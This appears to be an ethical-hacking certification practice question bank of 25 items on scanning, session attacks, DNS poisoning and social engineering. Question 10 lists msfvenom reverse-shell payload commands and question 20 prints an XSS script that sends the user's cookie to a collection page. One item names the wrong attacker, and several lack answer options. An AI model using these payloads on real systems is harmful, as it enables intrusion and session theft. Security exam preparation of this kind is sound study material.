Question 1
Question
Taylor, a security professional, uses a tool to monitor her company's website, website's traffic, and track the geographical location of the users visiting the company's website. Which of the following tools did Taylor employ in the above scenario?
Answer
- WebSite-Watcher
- Web-Stat
- WAFW00F
- Webroot
Question 2
Question
Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques must he use to perform the given task?
Answer
- ARP ping scan
- UDP Scan
- ACK flag probe scan
- TCP Maimon scan
Question 3
Question
What is the common name for a vulnerability disclosure program opened by companies in platforms such as HackerOne?
Question 4
Question
Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The session ID links the target employee to Boney's account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment details entered in a form are linked to Boney's account. What is the attack performed by Boney in the above scenario?
Answer
- Session donation attack
- Session fixation attack
- Forbidden attack
- CRIME attack
Question 5
Question
Henry is a cyber security specialist hired by BlackEye - Cyber Security Solutions. He was tasked with discovering the operating system (OS) of a host. He used the Unicornscan tool to discover the OS of the target system. As a result, he obtained a TTL value, which indicates that the target system is running a Windows OS. Identify the TTL value Henry obtained, which indicates that the target OS is Windows.
Question 6
Question
By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB service and occasionally entered your login and password in plaintext. Which file do you have to clean to clear the password?
Answer
- profile
- xsession-log
- bash history
- bashrc
Question 7
Question
A DDoS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target server opens multiple connections and keeps waiting for the requests to complete. Which attack is being described here?
Answer
- Phlashing
- Slowloris attack
- Desynchronization
- Session splicing
Question 8
Question
What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an organization?
Answer
- The attacker uses TCP to poison the DNS resolver
- The attacker makes a request to the DNS resolver
- The attacker forges a reply from the DNS resolver
- The attacker queries a nameserver using the DNS resolver
Question 9
Question
John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization. In the attack process, the professional hacker installed a scanner on a machine belonging to one of the victims and scanned several machines on the same network to identify vulnerabilities to perform further exploitation. What is the type of vulnerability assessment tool employed by John in the above scenario?
Answer
- Agent-based scanner
- Network-based scanner
- Proxy scanner
- Cluster scanner
Question 10
Question
What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?
Answer
- msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
- msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
Question 11
Question
Attacker Rony installed a rogue access point within an organization's perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by Johnson in the above scenario?
Question 12
Question
Bella, a security professional working at an IT firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. To address this situation, Bella implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by Bella?
Question 13
Question
Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this organization to perform sophisticated attacks and bring down its reputation in the market. To launch the attack process, he performed DNS footprinting to gather information about DNS servers and to identify the hosts connected in the target network. He used an automated tool that can retrieve information about DNS zone data including DNS domain names, computer names, IP addresses, DNS records, and network Whois records. He further exploited this information to launch other sophisticated attacks. What is the tool employed by Gerard in the above scenario?
Answer
- Towelroot
- Knative
- Bluto
- zANTI
Question 14
Question
In order to tailor your tests during a web-application scan, you decide to determine which web-server version is hosting the application. On using the -sV flag with Nmap, you obtain the following response:
80/tcp open http-proxy Apache Server 7.1.6
What information-gathering technique does this best describe?
Answer
- Banner grabbing
- Brute forcing
- Dictionary attack
- WHOIS lookup
Question 15
Question
Security administrator John Smith has noticed abnormal amounts of traffic coming from local computers at night. Upon reviewing, he finds that user data have been exfiltrated by an attacker. AV tools are unable to find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs. What type of malware did the attacker use to bypass the company's application whitelisting?
Answer
- File-less malware
- Phishing malware
- Logic bomb malware
- Zero-day malware
Question 16
Question
Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and location tags of recently visited places. Realizing this, James, a professional hacker, targets Emily and her acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers information to perform other sophisticated attacks. What is the tool employed by James in the above scenario?
Answer
- Hootsuite
- VisualRoute
- HULK
- ophcrack
Question 17
Question
Which of the following Bluetooth hacking techniques refers to the theft of information from a wireless device through Bluetooth?
Answer
- Bluesmacking
- Bluebugging
- Bluejacking
- Bluesnarfing
Question 18
Question
Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network.
Which of the following Nmap commands must John use to perform the TCP SYN ping scan?
Answer
- nmap -sn -PP <target IP address>
- nmap -sn -PO <target IP address>
- nmap -sn -PS <target IP address>
- nmap -sn -PA <target IP address>
Question 19
Question
Which file is a rich target to discover the structure of a website during web-server footprinting?
Answer
- Index.html
- robots.txt
- domain.txt
- document root
Question 20
Question
Judy created a forum. One day, she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images:
<script>
document.write('<img src="https://localhost/submitcookie.php?cookie=' + escape(document.cookie) + '" />');
</script>
What issue occurred for the users who clicked on the image?
Answer
- This php file silently executes the code and grabs the user's session cookie and session ID.
- The code is a virus that is attempting to gather the user's username and password.
- The code injects a new cookie to the browser.
- The code redirects the user to another site.
Question 21
Question
An attacker redirects the victim to malicious websites by sending them a malicious link by email. The link appears authentic but redirects the victim to a malicious web page, which allows the attacker to steal the victim's data. What type of attack is this?
Answer
- Spoofing
- Vishing
- DDoS
- Phishing
Question 22
Question
Joe works as an IT administrator in an organization and has recently set up a cloud computing service for the organization. To implement this service, he reached out to a telecom company for providing Internet connectivity and transport services between the organization and the cloud service provider. In the NIST cloud deployment reference architecture, under which category does the telecom company fall in the above scenario?
Answer
- Cloud broker
- Cloud auditor
- Cloud consumer
- Cloud carrier
Question 23
Question
Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical support team from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to Johnson's machine. What is the social engineering technique Steve employed in the above scenario?
Answer
- Phishing
- Quid pro quo
- Elicitation
- Diversion theft
Question 24
Question
Jane, an ethical hacker, is testing a target organization's web server and website to identify security loopholes. In this process, she copied the entire website and its content on a local drive to view the complete profile of the site's directory structure, file structure, external links, images, web pages, and so on. This information helps Jane map the website's directories and gain valuable information. What is the attack technique employed by Jane in the above scenario?
Answer
- Website defacement
- Web cache poisoning
- Session hijacking
- Website mirroring
Question 25
Question
Allen, a professional pen tester, was hired by XpertTech Solutions to perform an attack simulation on the organization's network resources. To perform the attack, he took advantage of the NetBIOS API and targeted the NetBIOS service. By enumerating NetBIOS, he found that port 139 was open and could see the resources that could be accessed or viewed on a remote system. He came across many NetBIOS codes during enumeration. Identify the NetBIOS code used for obtaining the messenger service running for the logged-in user?